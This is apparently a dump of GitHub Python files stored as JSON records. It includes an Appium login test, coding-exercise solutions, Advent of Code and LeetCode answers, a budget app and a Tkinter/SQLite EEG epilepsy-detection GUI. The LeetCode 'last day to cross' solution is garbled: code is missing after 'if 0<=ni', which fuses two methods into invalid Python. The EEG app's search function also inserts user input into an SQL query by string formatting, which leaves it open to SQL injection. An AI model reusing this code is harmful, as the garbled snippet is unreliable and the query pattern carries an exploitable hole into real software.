c\r\nfrom psam.psam import Psam\r\nclass Login(object):\r\n \r\n def __init__(self, driver, username, pwd):\r\n self.username = username\r\n self.pwd = pwd\r\n self.driver = driver\r\n \r\n def loginAction(self):\r\n \r\n try:\r\n \r\n self.driver.reset()\r\n \r\n time.sleep(8)\r\n \r\n c.waitForElement(self.driver, By.XPATH, r\"//android.widget.ImageView[@index='0']\").click()\r\n # enter the username and password\r\n els = self.driver.find_elements_by_id('cn.cj.pe:id/input')\r\n print('entering username')\r\n els[0].send_keys(self.username)\r\n \r\n print('entering password')\r\n els[1].send_keys(self.pwd)\r\n \r\n print('click login')\r\n loginButton = c.waitForElement(self.driver, By.ID, 'cn.cj.pe:id/login')\r\n \r\n print('start timing and click login')\r\n start = time.time()\r\n loginButton.click()\r\n \r\n print('wait for Element')\r\n c.waitForElement(self.driver, By.ID, 'cn.cj.pe:id/submit')\r\n end = time.time()\r\n \r\n # c.waitForElement(self.driver,By.ID, 'cn.cj.pe:id/check')\r\n # print('click')\r\n # els2 = self.driver.find_elements_by_id('cn.cj.pe:id/check')\r\n # print('click')\r\n # 
els2[0].click()\r\n # print('click')\r\n # els2[1].click()\r\n print('click submit')\r\n c.waitForElement(self.driver, By.ID, 'cn.cj.pe:id/submit').click()\r\n \r\n valueTime = str(round((end - start), 2))\r\n print('time difference: %r' % valueTime)\r\n return valueTime\r\n except BaseException:\r\n print('error during first login!!!')\r\n return 0\r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"hi-cbh/pytest","sub_path":"src/testcase/v722/case/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15836747352","text":"# My solution\nN, K = map(int, input().split())\n\nresult = 0\nwhile N != 1:\n if N % K != 0:\n N -= 1\n else:\n N //= K\n\n result += 1\n\nprint(result)\n\n# Book's solution\nn, k = map(int, input().split())\nresult = 0\n\nwhile True:\n target = (n // k) * k\n result += (n - target)\n n = target\n\n if n < k:\n break\n\n result += 1\n n //= k\n\nresult += (n - 1)\nprint(result)","repo_name":"mark1346/coding_test_study","sub_path":"keongmin/ch3/2-3-4.py","file_name":"2-3-4.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"512543659","text":"import re\nimport collections\n\ntape = collections.defaultdict(int)\ncursor = 0\n\n\n\"\"\"Begin in state A.\nPerform a diagnostic checksum after 6 steps.\n\nIn state A:\n If the current value is 0:\n - Write the value 1.\n - Move one slot to the right.\n - Continue with state B.\n If the current value is 1:\n - Write the value 0.\n - Move one slot to the left.\n - Continue with state B.\n\nIn state B:\n If the current value is 0:\n - Write the value 1.\n - Move one slot to the left.\n - Continue with state A.\n If the current value is 1:\n - Write the value 1.\n - Move one slot to the right.\n - Continue with state A.\"\"\"\n\nBEGIN_INSTR = re.compile(r'Begin in state (?P<beginstate>[A-Z])\\.')\nCHECKSUM_INSTR = re.compile(r'Perform a diagnostic checksum after (?P<checksum>[0-9]+) steps\\.')\nSTATE_BEGIN = re.compile(r'In state (?P<statename>[A-Z]):')\nSTATE_IF = re.compile(r'If the current value is (?P<curval>[0-1]):')\nWRITE_RULE = re.compile(r'- Write the value (?P<val>[0-1])\\.')\nMOVE_RULE = re.compile(r'- Move one slot to the (?P<dir>(left|right))\\.')\nCONTINUE_RULE = re.compile(r'- Continue with state (?P<nextstate>[A-Z])\\.')\n\nwith open('day25.in', 'r') as f:\n\tinp = [x.strip() for x in f.readlines()]\n\t\n\t# Read begin state\n\tbeginstate = BEGIN_INSTR.match(inp[0]).group('beginstate')\n\t# Checksum after\n\tchecksum = int(CHECKSUM_INSTR.match(inp[1]).group('checksum'))\n\n\tstates = {}\n\tinstrs = {}\n\n\ti = 2\n\twhile i < len(inp):\n\t\tinstrs = {}\n\t\t# Disregard empty line\n\t\t#print(\"SKIP\", inp[i])\n\t\ti += 1\n\t\t# Read state name\n\t\t#print(\"STATE\", inp[i])\n\t\tstate = STATE_BEGIN.match(inp[i]).group('statename')\n\t\ti += 1\n\t\t# Read next value\n\t\t#print(\"IF\", inp[i])\n\t\tvalue = int(STATE_IF.match(inp[i]).group('curval'))\n\t\ti += 1\n\t\t# Read write instr\n\t\t#print(\"WRITE\", inp[i])\n\t\twrite = int(WRITE_RULE.match(inp[i]).group('val'))\n\t\ti += 1\n\t\t# Read move instr\n\t\t#print(\"MOVE\", inp[i])\n\t\tmove = MOVE_RULE.match(inp[i]).group('dir')\n\t\ti += 1\n\t\t# Read continue instr\n\t\t#print(\"CONTINUE\", inp[i])\n\t\tnxt = CONTINUE_RULE.match(inp[i]).group('nextstate')\n\t\ti += 1\n\t\tinstrs[value] = {'write': write, 'move': move, 'next': nxt}\n\t\t# Read next value\n\t\tvalue = int(STATE_IF.match(inp[i]).group('curval'))\n\t\ti += 1\n\t\t# Read write instr\n\t\twrite = 
int(WRITE_RULE.match(inp[i]).group('val'))\n\t\ti += 1\n\t\t# Read move instr\n\t\tmove = MOVE_RULE.match(inp[i]).group('dir')\n\t\ti += 1\n\t\t# Read continue instr\n\t\tnxt = CONTINUE_RULE.match(inp[i]).group('nextstate')\n\t\ti += 1\n\t\tinstrs[value] = {'write': write, 'move': move, 'next': nxt}\n\t\tstates[state] = instrs\n\n#print(states)\n\n# Start in the begin state\ncurrent_state = beginstate\n\n#print(dict(tape), cursor, current_state)\n# Run for the required amount of steps\nfor i in range(checksum):\n\toldval = tape[cursor]\n\t# Write value belonging to current state and value\n\ttape[cursor] = states[current_state][oldval]['write']\n\t# Move in direction belonging to current state and value\n\tnewdir = states[current_state][oldval]['move']\n\tif newdir == \"left\":\n\t\tcursor -= 1\n\telse:\n\t\tcursor += 1\n\t# Continue in next state belonging to current state and value\n\tcurrent_state = states[current_state][oldval]['next']\n\n\t#print(dict(tape), cursor, current_state)\n\nprint(\"Number of 1s:\", sum([x for x in tape.values() if x == 1]))\n","repo_name":"Kurocon/AdventOfCode2017","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23776355081","text":"'''\n1970. Last Day Where You Can Still Cross\nHard\n\n1054\n\n19\n\nAdd to List\n\nShare\nThere is a 1-based binary matrix where 0 represents land and 1 represents water. You are given integers row and col representing the number of rows and columns in the matrix, respectively.\n\nInitially on day 0, the entire matrix is land. However, each day a new cell becomes flooded with water. You are given a 1-based 2D array cells, where cells[i] = [ri, ci] represents that on the ith day, the cell on the rith row and cith column (1-based coordinates) will be covered with water (i.e., changed to 1).\n\nYou want to find the last day that it is possible to walk from the top to the bottom by only walking on land cells. You can start from any cell in the top row and end at any cell in the bottom row. 
You can only travel in the four cardinal directions (left, right, up, and down).\n\nReturn the last day where it is possible to walk from the top to the bottom by only walking on land cells.\n\n \n\nExample 1:\n\n\nInput: row = 2, col = 2, cells = [[1,1],[2,1],[1,2],[2,2]]\nOutput: 2\nExplanation: The above image depicts how the matrix changes each day starting from day 0.\nThe last day where it is possible to cross from top to bottom is on day 2.\nExample 2:\n\n\nInput: row = 2, col = 2, cells = [[1,1],[1,2],[2,1],[2,2]]\nOutput: 1\nExplanation: The above image depicts how the matrix changes each day starting from day 0.\nThe last day where it is possible to cross from top to bottom is on day 1.\nExample 3:\n\n\nInput: row = 3, col = 3, cells = [[1,2],[2,1],[3,3],[2,2],[1,1],[1,3],[2,3],[3,2],[3,1]]\nOutput: 3\nExplanation: The above image depicts how the matrix changes each day starting from day 0.\nThe last day where it is possible to cross from top to bottom is on day 3.\n \n\nConstraints:\n\n2 <= row, col <= 2 * 104\n4 <= row * col <= 2 * 104\ncells.length == row * col\n1 <= ri <= row\n1 <= ci <= col\nAll the values of cells are unique.\n'''\nclass Solution:\n def latestDayToCross(self, row: int, col: int, cells: List[List[int]]) -> int:\n def dfs(i, j, mat):\n # print(i, j, mat)\n if i == row-1:\n return True\n mat[i][j] = 1\n for ni, nj in [(i-1, j), (i, j-1), (i, j+1), (i+1, j)]:\n if 0<=ni int:\n class UF:\n def __init__(self, n):\n self.root = [i for i in range(n)]\n self.rank = [0 for _ in range(n)]\n \n def find(self, x):\n if self.root[x] != x:\n self.root[x] = self.find(self.root[x])\n return self.root[x]\n \n def union(self, x, y):\n rx, ry = self.find(x), self.find(y)\n if rx != ry:\n if self.rank[rx] < self.rank[ry]:\n self.root[rx] = ry\n else:\n self.root[ry] = rx\n if self.rank[rx] == self.rank[ry]:\n self.rank[rx] += 1\n \n uf = UF(row*col+2)\n grid = [[1]*col for _ in range(row)]\n directions = [(-1, 0), (0, -1), (0, 1), (1, 0)]\n \n for i in range(row*col-1, -1, -1):\n r, c = cells[i][0]-1, cells[i][1]-1\n grid[r][c] = 0\n ind1 = r*col + c + 1\n for dr, dc in directions:\n nr, nc = r+dr, c+dc\n \n if 0<=nr list:\n \"\"\"\n z-algorithm for pattern matching\n\n :param string: a string \n\n :returns: the z array \n \"\"\"\n assert len(string) != 0\n\n # initialize z array\n z_arr = [0 for _ in range(len(string))]\n\n # length of string stored in first cell\n z_arr[0] = n = len(string)\n\n l, r, k = 0, 0, 0\n for i in range(1, n):\n\n # CASE 1: i>R (i outside box or no box)\n # calculate Z[i] naively\n if i > r:\n l, r = i, i\n\n # compare\n while r < n and string[r - l] == string[r]:\n r += 1\n z_arr[i] = r - l\n r -= 1\n\n # CASE 2: i<=R (i inside box)\n else:\n # k = i-L so k corresponds to number which\n # matches in [L,R] interval.\n k = i - l\n\n # CASE 2a: Z[k] < remaining\n # Z[i] equal to Z[k]\n if z_arr[k] < r - i + 1:\n z_arr[i] = z_arr[k]\n\n # CASE 2b: z[k] > remaining\n # z[i] = remaining\n elif z_arr[k] > r - i + 1:\n z_arr[i] = r - i + 1\n\n # CASE 2c: Z[k] = remaining\n # compare string[r + 1 ... 
r + n]\n elif z_arr[k] == r - i + 1:\n l = i\n while r < n and string[r - l] == string[r]:\n r += 1\n z_arr[i] = r - l\n r -= 1\n return z_arr\n\n\ndef period_old(string):\n \"\"\"\n z_algo = O(n)\n BM = O(n + m)\n \"\"\"\n z_arr = z_algo(string) # O(n)\n len_string = z_arr[0]\n \n p = 0\n expected_k = len_string\n while expected_k:\n p = len_string//expected_k\n \n actual_k = 0\n for i in z_arr:\n if i >= p:\n actual_k += 1\n \n if actual_k == expected_k:\n break\n \n expected_k -= 1\n while expected_k and len_string//expected_k == p:\n p = len_string//expected_k\n expected_k -= 1\n \n result = p\n if expected_k == 1:\n result = \"string not periodic\"\n \n return result\n\ndef period(string):\n \"\"\"\n z_algo = O(n)\n BM = O(n + m)\n \"\"\"\n z_arr = z_algo(string) # O(n)\n len_string = z_arr[0]\n \n i = len_string - 1\n while z_arr[i] == 0 and i >= 0:\n i -= 1\n p = z_arr[i]\n \n if p + z_arr[p] == len_string:\n return p \n \n return \"string not periodic\"\n \n\nif __name__ == \"__main__\":\n print(period(\"abcdabcdabcdabcdabcdabcd\"))\n print(z_algo(\"bbccaebbcabd\"))","repo_name":"OohpiEr/FIT3155-S1-2022","sub_path":"Assignment 1/ref/z_algo.py","file_name":"z_algo.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17102922382","text":"# with open(\"weather_data.csv\") as data:\n# print(data.readlines())\nimport csv\nimport pandas\nimport pandas as pd\n# -------------------------------------------------\n# with open(\"weather_data.csv\") as text:\n# data = csv.reader(text)\n# temp = []\n# for row in data:\n# # print(row)\n# if row[1].isdigit():\n# temp1 = row[1]\n# temp.append(int(temp1))\n# print(temp)\n#--------------------------------------------------------\n\n# data = pandas.read_csv(\"weather_data.csv\")\n'''For fetching values from column'''\n# temp_list = data[\"temp\"].to_list()\n# sum_list = data[\"temp\"].sum()\n# avg_sum = round(sum_list/len(temp_list),4)\n# print(avg_sum)\n# max_value = data[\"temp\"].max()\n# print(max_value)\n# print(data.condition)\n'''For fetching values from row'''\n# max_value = data.temp.max()\n# print(data[data.temp == max_value])\n# mon = data[data.day == \"Monday\"]\n# print(f\"{(mon.temp*1.8)+32}\")\n'''Creating dataframe from scratch'''\n# data_dict = {\n# \"students\":[\"Any\",\"James\",\"Angela\",\"Hitesh\"],\n# \"scores\":[76,89,92,99]\n# }\n# data = pandas.DataFrame(data_dict)\n# data.to_csv(\"data_dict.csv\")\n\n# -------------------------------------------------------------------\n\nsquirrel_data = pd.read_csv(\"squirrel_data.csv\")\ngray_count = len(squirrel_data[squirrel_data[\"Primary Fur Color\"] == \"Gray\"])\ncinnamon_count = len(squirrel_data[squirrel_data[\"Primary Fur Color\"] == \"Cinnamon\"])\nblack_count = len(squirrel_data[squirrel_data[\"Primary Fur Color\"] == \"Black\"])\ncolor_data = {\n \"Fur_color\":[\"Gray\", \"Red\", \"Black\"],\n \"Count\":[gray_count, cinnamon_count, black_count]\n}\ndata = pd.DataFrame(color_data)\ndata.to_csv(\"Fur Color.csv\")\n\n# print(data)\n\n# new_data = pd.read_csv(\"Fur Color.csv\")\n# print(new_data)\n","repo_name":"Hit07/Minor-Project-Python","sub_path":"Data Analytics/Squirrel Data Analytics 2018/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21295758216","text":"#%% Class\nclass Category:\n \n def __init__(self, category):\n self.category = 
category\n self.ledger = []\n self.total = 0\n \n def deposit(self, amount, description=\"\"): \n \n new_record = {\"amount\": float(amount), \"description\": description} \n self.ledger.append(new_record)\n self.total = self.total + amount\n\n \n def withdraw(self, amount, description=\"\"):\n self.amount = amount\n self.description = description\n \n if self.total > self.amount:\n new_record= {\"amount\": -abs(amount), \"description\":description} \n self.ledger.append(new_record)\n self.total = self.total - self.amount\n return True\n else:\n return False\n \n \n def get_balance(self):\n return self.total\n \n def transfer(self, amount, another_category):\n if self.total > amount: \n self.ledger.append({'amount': -abs(amount), 'description': f\"Transfer to {another_category.category}\"})\n self.total = self.total - amount\n \n another_category.ledger.append({'amount': float(amount), 'description': f\"Transfer from {self.category}\"})\n another_category.total = another_category.total + amount\n \n return True\n \n else:\n return False\n\n def check_funds(self, amount):\n if self.total >= amount: \n return True\n else:\n return False\n \n def __str__(self): \n length_of_category_name = len(self.category)\n start_index_of_category_name = (30 - length_of_category_name)/2 - 1\n number_of_stars = int((30 - length_of_category_name)/2) * \"*\"\n \n all_output = ''\n \n for x in self.ledger:\n for k, v in x.items():\n if k == 'amount':\n amount = \"{:.2f}\".format(v)\n if k == 'description':\n if v != '':\n description = v[:23]\n else:\n description = ' '\n \n space = (30 - (len(description) + len(str(amount)))) * ' '\n \n ledger_output = f'{description}{space}{amount}'\n all_output = f'{all_output}\\n{ledger_output}'\n \n \n return f'{number_of_stars}{self.category}{number_of_stars}{all_output}\\nTotal: {self.total}'\n \n\n#%% Function\ndef create_spend_chart(categories):\n \n list_of_expenses_for_category = []\n list_of_percentage_for_category = []\n list_of_rounded_percentages = []\n sum_of_all_expenses = 0 \n category_names = []\n \n for x in categories:\n category_name = x.category\n expenses = 0\n category_names.append(category_name)\n \n for y in x.ledger:\n for k,v in y.items():\n if (isinstance(v, float) or isinstance(v, int)) and v < 0:\n expenses = expenses + abs(v)\n \n list_of_expenses_for_category.append({category_name:expenses})\n \n for x in list_of_expenses_for_category:\n for k, v in x.items():\n sum_of_all_expenses = sum_of_all_expenses + v\n \n for x in list_of_expenses_for_category:\n for k, v in x.items(): \n percentage_for_category = int((v/sum_of_all_expenses)*100)\n list_of_percentage_for_category.append({k:percentage_for_category})\n \n for x in list_of_percentage_for_category: \n for k,v in x.items():\n new_value = (v//10)*10\n list_of_rounded_percentages.append(new_value)\n \n #Chart\n title = f'Percentage spent by category\\n' \n chart = \"\"\n for value in reversed(range(0, 101, 10)):\n chart += str(value).rjust(3) + '|'\n for x in list_of_rounded_percentages:\n if x >= value:\n chart += \" o \"\n else:\n chart += \" \"\n \n chart += \" \\n\" \n \n footer = \" \" + \"-\" * ((3 * len(categories)) + 1) + \"\\n\"\n max_length = max(map(lambda x: len(x), category_names))\n category_names_with_spaces = list(map(lambda name: name.ljust(max_length), category_names))\n\n for x in zip(*category_names_with_spaces):\n footer += \" \" + \"\".join(map(lambda s: s.center(3), x)) + \" \\n\"\n\n return (title + chart + footer).rstrip(\"\\n\")\n\n \n 
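# Illustrative usage: a minimal, hedged sketch added for clarity; the category\n# names and amounts below are invented for demonstration only.\nif __name__ == \"__main__\":\n food = Category(\"Food\")\n food.deposit(1000, \"initial deposit\")\n food.withdraw(10.15, \"groceries\")\n clothing = Category(\"Clothing\")\n # transfer() records a negative entry on food and a matching positive\n # entry on clothing\n food.transfer(50, clothing)\n print(food)\n print(create_spend_chart([food, clothing]))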
","repo_name":"barbara-wachek/courses_and_exercises","sub_path":"freecodecamp_03_budget_app/budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22315534345","text":"import sys\n\nn, m = map(int, sys.stdin.readline().split())\nis_succ = [False] * n\nscores = [\"\"] * n\n\nfor i in range(n):\n scores[i] = input()\n\nfor i in range(m):\n max_score = 0\n for j in range(n):\n if max_score < int(scores[j][i]):\n max_score = int(scores[j][i])\n for j in range(n):\n if max_score == int(scores[j][i]):\n is_succ[j] = True\n\nans = 0\nfor i in range(n):\n if is_succ[i]:\n ans += 1\n\nprint(ans)\n","repo_name":"guzhoudiaoke/practice","sub_path":"codeforces/152A/py/152a.py","file_name":"152a.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27743072116","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import tix\nfrom tkinter import messagebox\nfrom tkinter.messagebox import showinfo\nfrom tkinter.filedialog import askopenfile\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import letter, A4\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.platypus import SimpleDocTemplate, Image\nimport webbrowser\nfrom tkinter.filedialog import askopenfile, askopenfilename\nfrom PIL import Image, ImageTk\nimport sqlite3\nimport numpy as np\nimport tensorflow as tf\nimport math\nimport sys\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport os\nimport time\nimport mne\nimport pyedflib\nfrom Classes2 import Evento\nfrom Classes2 import SinalEEG\nfrom Functions import load, processing, network, plots\n#from Modulos import LeituraArquivos,ConfusionMatrix, ProcessamentoDoSinal, LeituraEventos, AssociaTrechoEvento, CriaImagen, CNN\n\nfrom Modulos2 import (\n CNN,\n AssociaTrechoEvento,\n ConfusionMatrix,\n CriaImagen,\n LeituraArquivos,\n LeituraEventos,\n ProcessamentoDoSinal,\n CriaRede,\n UsaRede,\n graficos,\n)\n\nImagem1 = \"ufmg _logo.png\"\n\nroot = tix.Tk()\naccuracyValue = \"A\"\nrecall = \"A\"\nprecision = \"A\"\narquivoName = \"\"\n\n# global variable\nblank_2 = []\nblank_1 = []\n\n\nclass Relatorios():\n def printCliente(self):\n webbrowser.open(\"cliente.pdf\")\n\n def gerarRelatorioCliente(self):\n self.c = canvas.Canvas(\"cliente.pdf\")\n self.codigoRel = self.codigo_entry.get()\n self.ageRel = self.age_entry\n self.infoRel = self.info_entry.get()\n self.generoRel = self.gender_entry\n self.accuracy = accuracyValue\n self.recall = recall\n self.precision = precision\n self.nomeArquivo = arquivoName\n\n self.c.setFont(\"Helvetica-Bold\", 24)\n self.c.drawString(200, 790, 'Ficha do Paciente')\n\n self.c.setFont(\"Helvetica-Bold\", 18)\n self.c.drawString(50, 700, 'Cod: ')\n self.c.drawString(50, 670, 'Age: ')\n self.c.drawString(50, 630, 'Gender: ')\n self.c.drawString(50, 600, 'Informations about: ')\n self.c.drawString(50, 570, 'File name: ')\n self.c.drawString(50, 530, 'Algorithm results: ')\n\n self.c.setFont(\"Helvetica\", 18)\n self.c.drawString(150, 700, self.codigoRel)\n self.c.drawString(150, 670, self.age_entry)\n\n self.c.drawString(150, 630, self.generoRel)\n self.c.drawString(200, 600, self.infoRel)\n self.c.drawString(200, 570, self.nomeArquivo)\n self.c.drawString(300, 530, self.accuracy)\n self.c.rect(20, 300, 550, 5, fill=True, 
stroke=False)\n\n self.c.showPage()\n self.c.save()\n self.printCliente()\n\n\nclass Funcs():\n def limpa_cliente(self):\n self.codigo_entry.delete(0, END)\n self.age_entry.delete(0, END)\n self.info_entry.delete(0, END)\n self.Tipvar.set('Male')\n self.nomeArquivo = ''\n self.accuracy_entry = ''\n self.recall_entry = ''\n self.precision_entry = ''\n\n def conecta_bd(self):\n self.conn = sqlite3.connect(\"clientes.bd\")\n self.cursor = self.conn.cursor()\n\n def desconecta_bd(self):\n self.conn.close()\n\n def montaTabelas(self):\n self.conecta_bd()\n ### Criar Tabela\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS clientes(\n cod INTEGER PRIMARY KEY,\n nomeArquivo CHAR(200) NOT NULL,\n info CHAR(200),\n age INT(50),\n genero CHAR(40),\n accuracy INT(40),\n recall INT(40),\n precision INT(40)\n );\n \n \"\"\")\n # ADD acurracy CHAR(40)\n self.conn.commit()\n self.desconecta_bd()\n\n def variaveis_inicio(self):\n self.codigo = self.codigo_entry.get()\n self.age = self.age_entry.get()\n self.genero = self.Tipvar.get()\n self.info = self.info_entry.get()\n self.nomeArquivo = self.nomeArquivo\n self.accuracy = self.accuracy_entry\n self.recall = self.recall_entry\n self.precision = self.precision_entry\n self.ditArquivoEDF = self.ditArquivoEDF\n self.nomeArquivoEDF = self.nomeArquivoEDF\n self.nome_arquivo_salvo = self.nome_arquivo_salvo\n\n def variaveis_acao(self):\n self.codigo = self.codigo_entry.get()\n self.age = self.age_entry.get()\n self.genero = self.Tipvar.get()\n self.info = self.info_entry.get()\n self.nomeArquivo = self.nomeArquivo\n self.accuracy = self.accuracy_entry\n self.recall = self.recall_entry\n self.precision = self.precision_entry\n\n def add_cliente(self):\n self.variaveis_inicio()\n if self.nome_arquivo_salvo == \"\":\n msg = \"To register a new patient,\\n\"\n msg += \"it is necessary to select the files\"\n messagebox.showinfo(\"Customer registration - Warning !!!\", msg)\n else:\n self.conecta_bd()\n self.cursor.execute(\n \"\"\" INSERT INTO clientes (age,genero, info, accuracy, recall, precision, nomeArquivo)\n VALUES(?, ?, ?, ?, ?, ?,?) \"\"\",\n (self.age, self.genero, self.info, self.accuracy, self.recall,\n self.precision, self.nome_arquivo_salvo))\n self.conn.commit()\n self.desconecta_bd()\n self.select_lista()\n self.limpa_cliente()\n\n def select_lista(self):\n self.listaCli.delete(*self.listaCli.get_children())\n self.conecta_bd()\n lista = self.cursor.execute(\n \"\"\" SELECT cod, age, genero , info, accuracy,recall,precision, nomeArquivo FROM clientes \n ORDER BY cod; \"\"\")\n\n for i in lista:\n self.listaCli.insert(\"\", END, values=i)\n self.desconecta_bd()\n\n def OnDoubleClick(self, event):\n self.limpa_cliente()\n self.listaCli.selection()\n\n for n in self.listaCli.selection():\n print(self.listaCli.item(n, 'values'))\n col1, col2, col3, col4, col5, col6, col7, col8 = self.listaCli.item(\n n, 'values')\n self.codigo_entry.insert(END, col1)\n self.info_entry.insert(END, col4)\n self.nomeArquivo = col8\n self.accuracy_entry = col5\n self.recall_entry = col6\n self.precision_entry = col7\n self.age_entry.insert(END, col2)\n self.Tipvar.set(col3)\n global accuracyValue\n accuracyValue = col5\n global recall\n recall = col6\n global precision\n precision = col7\n global arquivoName\n arquivoName = col8\n\n def deleta_cliente(self):\n self.variaveis_acao()\n self.conecta_bd()\n self.cursor.execute(\"\"\" DELETE FROM clientes WHERE cod = ? 
\"\"\",\n (self.codigo,))\n self.conn.commit()\n self.desconecta_bd()\n self.limpa_cliente()\n self.select_lista()\n\n def alterar_cliente(self):\n self.variaveis_acao()\n self.conecta_bd()\n self.cursor.execute(\n \"\"\" UPDATE clientes SET age = ?, info = ?, genero = ?, accuracy = ?, recall=?, precision=?, nomeArquivo = ?\n WHERE cod = ? \"\"\",\n (self.age, self.info, self.genero, accuracyValue, recall,\n precision, arquivoName, self.codigo))\n self.conn.commit()\n self.desconecta_bd()\n self.select_lista()\n self.limpa_cliente()\n\n def busca_cliente(self):\n self.conecta_bd()\n self.listaCli.delete(*self.listaCli.get_children())\n\n codigo = self.codigo_entry.get()\n self.cursor.execute(\n \"\"\" SELECT cod, age, info, genero, accuracy, recall, precision, nomeArquivo FROM clientes\n WHERE cod LIKE '%s' ORDER BY cod ASC\"\"\" % codigo)\n buscaCli = self.cursor.fetchall()\n for i in buscaCli:\n self.listaCli.insert(\"\", END, values=i)\n self.limpa_cliente()\n self.desconecta_bd()\n\n\nclass Application(Funcs, Relatorios):\n def __init__(self):\n self.root = root\n self.root2 = root\n self.sinal_eeg = []\n self.eventos = []\n self.nomeArquivo = ''\n self.accuracy_entry = ''\n self.ditArquivoEDF = ''\n self.nomeArquivoEDF = ''\n self.nome_arquivo_salvo = ''\n self.recall_entry = ''\n self.precision_entry = ''\n self.new_model_name = ''\n self.tela()\n self.frames_de_tela()\n self.widgets_frame()\n self.montaTabelas()\n\n root.mainloop()\n\n def buscar_arquivo(self):\n aux, self.nomeArquivo = LeituraArquivos.ImportarSinalEEG()\n print(\"-------------------------------\")\n print(self.nomeArquivo)\n print(\"-------------------------------\")\n self.sinal_eeg.append(aux)\n aux2 = LeituraEventos.importar_evento()\n self.eventos.append(aux2)\n\n def buscar_arquivo2(self):\n self.ditArquivoEDF, self.ditArquivoTSE = LeituraArquivos.ImportarDiretorios(\n )\n print(\"EDF FILE DIRECTORY \" + self.ditArquivoEDF)\n print(\"TSE FILE DIRECTORY \" + self.ditArquivoTSE)\n\n def buscar_arquivos3(self):\n self.nomeArquivoEDF, self.nomeArquivoTSE = LeituraArquivos.ImportarCaminhoArquivos(\n )\n print(\"File name \" + self.nomeArquivoEDF)\n print(\"File name \" + self.nomeArquivoTSE)\n\n def buscar_arquivos(self):\n # import the full paths of the selected files\n print(\" READ THE FILES AND GOT THE PATHS ---------------------\")\n self.nomeArquivoEDF, self.nomeArquivoTSE = LeituraArquivos.ImportarCaminhoArquivos(\n )\n\n print(\"EDF FILE PATH \" + self.nomeArquivoEDF)\n print(\"TSE FILE PATH \" + self.nomeArquivoTSE)\n # extract the original file names\n print(\"NOW GETTING THE ORIGINAL NAMES ---------------------\")\n path = self.nomeArquivoEDF\n nome_arquivo = self.nomeArquivoEDF\n nome_original = os.path.basename(os.path.normpath(path))\n self.ditArquivoEDF = nome_arquivo.replace(nome_original, '')\n\n path2 = self.nomeArquivoTSE\n nome_arquivo2 = self.nomeArquivoTSE\n nome_original2 = os.path.basename(os.path.normpath(path2))\n self.ditArquivoTSE = nome_arquivo2.replace(nome_original2, '')\n\n print(\"EDF FILE DIRECTORY \" + self.ditArquivoEDF)\n print(\"TSE FILE DIRECTORY \" + self.ditArquivoTSE)\n\n # keep only the path without the file name, and read the events\n print(\"NOW GETTING JUST THE PATH AND THE EVENTS ---------------------\")\n self.nomeArquivo = self.nomeArquivoEDF\n path = self.nomeArquivoEDF\n nome_original = os.path.basename(os.path.normpath(path))\n print('Original name: ' + nome_original)\n sinal_arquivo_edf = pyedflib.EdfReader(self.nomeArquivoEDF)\n sinal_eeg = 
SinalEEG.SinalEEG(sinal_arquivo_edf)\n nome_arquivo_tse = self.nomeArquivoEDF.replace(\".edf\", \".tse\")\n self.nome_arquivo_salvo = nome_original.replace(\".edf\", \"\")\n self.sinal_eeg.append(sinal_eeg)\n conteudo = np.genfromtxt(self.nomeArquivoTSE,\n dtype=\"str\",\n skip_header=2)\n quantidade_eventos = len(conteudo[:])\n eventos = []\n\n for i in range(0, quantidade_eventos - 1):\n evento = Evento.Evento(\n float(conteudo[i][0]),\n float(conteudo[i][1]),\n conteudo[i][2],\n float(conteudo[i][3]),\n )\n eventos.append(evento)\n\n sinal_eeg2 = eventos\n self.eventos.append(sinal_eeg2)\n\n print(\"FIM ---------------------------\")\n\n def comecar(self):\n self.JanelaClassificacao()\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n self.add_cliente()\n\n def comecar2(self):\n print(\"---------------------\")\n self.JanelaPrediction()\n print(\"---------------------\")\n self.accuracy_entry = self.accurancyValue_Entry\n self.recall_entry = self.recallValue_Entry\n self.precision_entry = self.precisionValue_Entry\n self.add_cliente()\n\n def tela(self):\n self.root.title(\"Epilepsy Detection\")\n self.root.config(bg=\"#DFEBE9\")\n self.root.geometry(\"1024x768\")\n self.root.resizable(True, True)\n self.root.maxsize(width=900, height=700)\n self.root.minsize(width=500, height=400)\n self.logo_cerebro = PhotoImage(file=\"logos/cerebrito.png\")\n label = Label(image=self.logo_cerebro, bg=\"#DFEBE9\")\n label.image = self.logo_cerebro # keep a reference!\n label.pack(side=LEFT, padx=64, pady=55)\n\n self.logo_ufmg = Image.open(\"logos/ufmg _logo.png\")\n self.resized_ufmg = self.logo_ufmg.resize((100, 42), Image.ANTIALIAS)\n self.logo_ufmg_resized = ImageTk.PhotoImage(self.resized_ufmg)\n label = Label(image=self.logo_ufmg_resized, bg=\"#DFEBE9\")\n label.image = self.logo_ufmg_resized # keep a reference!\n label.pack(side=LEFT, anchor=SE, padx=30, pady=30)\n\n self.logo_labbio = Image.open(\"logos/labbio_logo.png\")\n self.resized_labbio = self.logo_labbio.resize((100, 42),\n Image.ANTIALIAS)\n 